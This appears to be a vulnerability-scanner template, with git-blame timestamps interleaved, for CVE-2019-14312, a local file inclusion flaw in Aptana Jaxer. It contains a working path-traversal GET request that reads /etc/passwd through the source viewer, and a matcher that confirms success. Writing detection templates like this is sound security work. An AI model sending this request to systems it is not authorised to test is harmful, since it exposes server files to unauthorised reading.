2021-07-28 02:04:19 +00:00
id : CVE-2019-14312
info :
name : Aptana Jaxer 1.0.3.4547 - Local File inclusion
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : medium
2021-07-28 02:04:19 +00:00
description : Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
2021-08-18 11:37:49 +00:00
reference :
2021-07-28 02:04:19 +00:00
- https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312
tags : cve,cve2019,lfi
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.50
cve-id : CVE-2019-14312
cwe-id : CWE-22
2021-07-28 02:04:19 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-28 02:04:19 +00:00
- type : status
status :
- 200